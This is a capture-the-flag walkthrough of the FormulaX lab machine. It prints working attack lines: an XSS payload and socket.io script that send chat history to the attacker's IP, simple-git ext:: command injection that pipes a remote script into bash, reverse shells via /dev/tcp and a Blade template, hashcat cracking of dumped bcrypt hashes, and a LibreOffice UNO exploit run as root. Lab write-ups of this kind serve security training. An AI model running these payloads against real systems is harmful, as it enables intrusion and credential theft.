🏎️

formulax

PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 5f:b2:cd:54:e4:47:d1:0e:9e:81:35:92:3c:d6:a3:cb (ECDSA) |_ 256 b9:f0:0d:dc:05:7b:fa:fb:91:e6:d0:b4:59:e6:db:88 (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) | http-title: Site doesn't have a title (text/html; charset=UTF-8). |_Requested resource was /static/index.html |_http-cors: GET POST |_http-server-header: nginx/1.18.0 (Ubuntu) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 4.15 - 5.8 (96%), Linux 5.3 - 5.4 (95%), Linux 5.0 - 5.5 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.0 (93%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
notion image
register a account ivan@gmail.com:123456
notion image
type help
notion image
Try if there is any secondary SQL injection in register page?
notion image
no , every syntax is being filtered exclude `@`
notion image
By base64 decode, i found this info in Cookie
Cookie: authorization=Bearer%20{"alg":"HS256","typ":"JWT"}.{"userID":"65effe4fa686df483ce47da7","iat":1710227146}.McTjCzxd8w26XRWH18qDyahlUpgqI-ZA1EAA_NI-KZM
we can see hash algorithm is HS256
notion image
 
Test if there is XSS existed . Seemly, <script> is being filtered.
Try the other way
php -S 0.0.0.0:80
<img SRC=p onerror="var script1 = document.createElement('script'); script1.src='http://10.10.16.23/test.js';document.head.appendChild(script1);" />
notion image
it does work
notion image
in chatbox, i can see it’s socket.io. And we can track the history.
notion image
notion image
socket.io.js:
notion image
notion image
notion image
write test.js as a listener.
const script = document.createElement('script'); script.src = '/socket.io/socket.io.js'; document.head.appendChild(script); script.addEventListener('load', function() { const res = axios.get(`/user/api/chat`); const socket = io('/',{withCredentials: true}); socket.on('message', (my_message) => {fetch("http://10.10.16.23:8000/?d=" + btoa(my_message))}) ; socket.emit('client_message', 'history'); });
php -S 0.0.0.0:8080 php -S 0.0.0.0:80
Send to “Contact_us” again:
notion image
notion image
History context received.(base64 encoded format)
V3JpdGUgYSBzY3JpcHQgZm9yICBkZXYtZ2l0LWF1dG8tdXBkYXRlLmNoYXRib3QuaHRiIHRvIHdvcmsgcHJvcGVybHk=
notion image
Retrieved subdomain dev-git-auto-update.chatbot.htb
echo "10.129.237.125 dev-git-auto-update.chatbot.htb" >>/etc/hosts
notion image
Found this page, showing upsimple-git v3.14
Searching on google
notion image
notion image
ext::sh -c bash -i >& /dev/tcp/10.10.16.23/6666 0>&1
Not works.
Create rev.sh
#!/bin/bash bash -c "bash -i >& /dev/tcp/10.10.16.23/6666 0>&1"
php -S 0.0.0.0:8000
ext::sh -c curl% http://10.10.16.23:8000/rev.sh|bash >&2
notion image
Connect to the reverse shell
notion image
File enumeration under /var
notion image
There is mongodb exists
notion image
notion image
show dbs use testing show collections
There are two collections under testing dbs. List all users info
db.users.find()
notion image
{ "_id" : ObjectId("648874de313b8717284f457c"), "name" : "admin", "email" : "admin@chatbot.htb", "password" : "$2b$10$VSrvhM/5YGM0uyCeEYf/TuvJzzTz.jDLVJ2QqtumdDoKGSa.6aIC.", "terms" : true, "value" : true, "authorization_token" : "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySUQiOiI2NDg4NzRkZTMxM2I4NzE3Mjg0ZjQ1N2MiLCJpYXQiOjE3MTAyOTE2NTF9.LSLn0klkH_MWk5-iMr2fPjDzcklg6sSrg-037lP6iIY", "__v" : 0 } { "_id" : ObjectId("648874de313b8717284f457d"), "name" : "frank_dorky", "email" : "frank_dorky@chatbot.htb", "password" : "$2b$10$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6", "terms" : true, "value" : true, "authorization_token" : " ", "__v" : 0 }
Two hashes found. Then try to recover them by hashcat
admin:$2b$10$VSrvhM/5YGM0uyCeEYf/TuvJzzTz.jDLVJ2QqtumdDoKGSa.6aIC. frank_dorky:$2b$10$hrB/by.tb/4ABJbbt1l4/ep/L4CTY6391eSETamjLp7s.elpsB4J6
notion image
notion image
hash cracking
hashcat -m 3200 hashes /usr/share/wordlists/rockyou.txt --username
notion image
The credential i get:
frank_dorky:manchesterunited
ssh frank_dorky@10.129.237.125
notion image
Get the initial access!
frank_dorky has no sudo
let me run linpeas
notion image
here is being hilighted as /usr/bin/python3.10 cap_net_raw=eip
But it is actually irrelavent
notion image
See some ports that are not normal, try port forwarding
ssh -L 3001:127.0.0.1:3000 frank_dorky@10.129.237.125
notion image
LibreNMS
google, but no PE exploitation available found
notion image
notion image
No access permission
notion image
Found an article about bypassing the permission limitation for LibreNMS
./adduser.php test test 10
notion image
notion image
login with test:test , we can see there error prompt.
See debugging
notion image
notion image
and here i need changing the forwarding port from 3001 to 3000, here i switch to kali linux
echo "127.0.0.1 librenms.com" >> /etc/hosts
ssh -L 3000:127.0.0.1:3000 frank_dorky@10.129.237.125
Access http://librenms.com:3000
notion image
Then enumerate the apps, i found templates
notion image
Reading this article:
notion image
@php system("bash -c 'bash -i >& /dev/tcp/10.10.16.23/6666 0>&1'");@endphp
notion image
write a reverse shell into template, and execute automatically.
notion image
Get a shell as user librenms
check environment variable
env
notion image
password found : mychemicalformulaX
Then, try this password with user kai_relay
ssh kai_relay@10.129.237.125
notion image
kai_relay owns sudo privilege to file /usr/bin/office.sh
notion image
#!/bin/bash /usr/bin/soffice --calc --accept="socket,host=localhost,port=2002;urp;" --norestore --nologo --nodefault --headless
The script seems used to start Openoffice calculator on port 2002
search on google for exploitation
import uno from com.sun.star.system import XSystemShellExecute import argparse parser = argparse.ArgumentParser() parser.add_argument('--host', help='host to connect to', dest='host', required=True) parser.add_argument('--port', help='port to connect to', dest='port', required=True) args = parser.parse_args() # Define the UNO component localContext = uno.getComponentContext() # Define the resolver to use, this is used to connect with the API resolver = localContext.ServiceManager.createInstanceWithContext( "com.sun.star.bridge.UnoUrlResolver", localContext ) # Connect with the provided host on the provided target port print("[+] Connecting to target...") context = resolver.resolve( "uno:socket,host={0},port={1};urp;StarOffice.ComponentContext".format(args.host,args.port)) # Issue the service manager to spawn the SystemShellExecute module and execute calc.exe service_manager = context.ServiceManager print("[+] Connected to {0}".format(args.host)) shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute") shell_execute.execute("cat", '/root/root.txt',1)
sudo /usr/bin/office.sh python3 exp.py --host 127.0.0.1 --port 2002
notion image
get the root flag!